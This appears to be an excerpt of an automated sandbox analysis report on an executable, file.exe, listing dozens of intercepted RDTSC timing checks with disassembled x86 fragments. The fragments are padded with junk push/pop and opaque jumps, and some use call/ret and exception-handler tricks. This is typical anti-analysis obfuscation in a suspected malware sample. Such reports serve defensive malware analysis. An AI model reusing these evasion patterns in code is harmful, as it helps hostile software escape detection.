Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B5F8 second address: D2B60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F1674F90E18h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E431 second address: D2E435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E435 second address: D2E449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F1674F90E16h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2F5C8 second address: D2F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D312B0 second address: D312B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3245B second address: D3245F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3341E second address: D33422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33422 second address: D3342C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3342C second address: D33432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33432 second address: D33436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33436 second address: D33451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33451 second address: D334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F1675279DA8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F1675279DA8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F1675279DA8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov ebx, 22909EE6h 0x0000004f push eax 0x00000050 push edi 0x00000051 pushad 0x00000052 jnc 00007F1675279DA6h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D314AD second address: D314B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D31557 second address: D3155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D336AF second address: D336B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3557F second address: D35584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D376F6 second address: D3770C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3770C second address: D37710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37710 second address: D37723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E1Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3794E second address: D37954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A851 second address: D3A855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38AB2 second address: D38AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A855 second address: D3A869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jbe 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F1674F90E18h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41D68 second address: D41D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41D70 second address: D41D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C714 second address: D4C744 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1675279DAAh 0x00000008 jmp 00007F1675279DB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F1675279DAEh 0x00000016 jp 00007F1675279DA6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C744 second address: D4C74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B440 second address: D4B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BA5D second address: D4BA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BA6C second address: D4BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BD03 second address: D4BD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1674F90E16h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007F1674F90E16h 0x00000016 popad 0x00000017 pushad 0x00000018 push edx 0x00000019 jmp 00007F1674F90E29h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C3E1 second address: D4C409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DB7h 0x0000000c jmp 00007F1675279DAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C409 second address: D4C448 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F1674F90E16h 0x00000013 jnc 00007F1674F90E16h 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1674F90E1Ch 0x00000023 jmp 00007F1674F90E25h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C448 second address: D4C454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C454 second address: D4C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F486 second address: D4F4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F1675279DBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE099E second address: CE09A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE09A8 second address: CE09AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A4C second address: D54A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A52 second address: D54A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A57 second address: D54A68 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1674F90E1Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54A68 second address: D54A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5386F second address: D53874 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53874 second address: D5387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26208 second address: D0716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F1674F90E18h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 cld 0x00000021 lea eax, dword ptr [ebp+12487FA0h] 0x00000027 xor dword ptr [ebp+12459526h], edx 0x0000002d nop 0x0000002e jc 00007F1674F90E2Fh 0x00000034 push eax 0x00000035 jmp 00007F1674F90E27h 0x0000003a pop eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 pop ecx 0x00000041 pop eax 0x00000042 nop 0x00000043 mov dword ptr [ebp+1245224Fh], esi 0x00000049 call dword ptr [ebp+1244DF9Bh] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 pushad 0x00000055 popad 0x00000056 jne 00007F1674F90E16h 0x0000005c ja 00007F1674F90E16h 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 push esi 0x00000066 pop esi 0x00000067 jg 00007F1674F90E16h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26314 second address: D263DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007F1675279DB7h 0x0000000c pop edi 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F1675279DA8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F1675279DB1h 0x0000002d xor edx, dword ptr [ebp+122D3702h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jmp 00007F1675279DACh 0x0000003f js 00007F1675279DA6h 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c cld 0x0000004d mov dword ptr [ebp+12487FF8h], esp 0x00000053 mov ch, CCh 0x00000055 cmp dword ptr [ebp+122D366Ah], 00000000h 0x0000005c jne 00007F1675279E7Fh 0x00000062 adc dh, FFFFFFB9h 0x00000065 mov byte ptr [ebp+122D3214h], 00000047h 0x0000006c jl 00007F1675279DA8h 0x00000072 mov eax, D49AA7D2h 0x00000077 or edi, dword ptr [ebp+12458111h] 0x0000007d nop 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F1675279DB6h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26ADD second address: D26AE7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26BD2 second address: D26BF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1675279DB7h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F1675279DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26BF9 second address: D26C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1674F90E28h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE7412 second address: CE7416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE7416 second address: CE745C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 jmp 00007F1674F90E1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F1674F90E2Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE745C second address: CE747E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DACh 0x00000008 jne 00007F1675279DACh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E2F second address: D53E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E33 second address: D53E39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E39 second address: D53E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F1674F90E1Eh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53E53 second address: D53E74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1675279DAEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DABh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5414F second address: D54166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F1674F90E1Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F1674F90E16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54596 second address: D5459B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D06D second address: D5D078 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D078 second address: D5D08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1675279DADh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D53E second address: D5D563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a jmp 00007F1674F90E29h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D9CD second address: D5D9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1675279DABh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DF1D second address: D5DF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DF26 second address: D5DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E589 second address: D5E59F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1674F90E16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d je 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E59F second address: D5E5A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E5A6 second address: D5E5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1674F90E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F1674F90E16h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E5D0 second address: D5E5DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1675279DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E5DA second address: D5E5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F1674F90E16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F1674F90E16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD4C second address: D5CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD50 second address: D5CD5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1674F90E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD5F second address: D5CD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F1675279DA6h 0x0000000f jmp 00007F1675279DADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CD7B second address: D5CD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D64364 second address: D64377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007F1675279DA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63034 second address: D63038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63038 second address: D6303C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6303C second address: D63048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D632D1 second address: D632D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D632D5 second address: D632DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63630 second address: D63636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D667EE second address: D667F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D667F4 second address: D667FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D667FD second address: D66801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66801 second address: D66837 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F1675279DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F1675279DBDh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F1675279DA6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66837 second address: D66841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66841 second address: D66847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66847 second address: D66866 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1674F90E16h 0x00000008 jmp 00007F1674F90E25h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D66866 second address: D6686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D69578 second address: D695B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1674F90E1Eh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E1Bh 0x00000014 jnl 00007F1674F90E16h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1674F90E1Fh 0x00000022 rdtsc
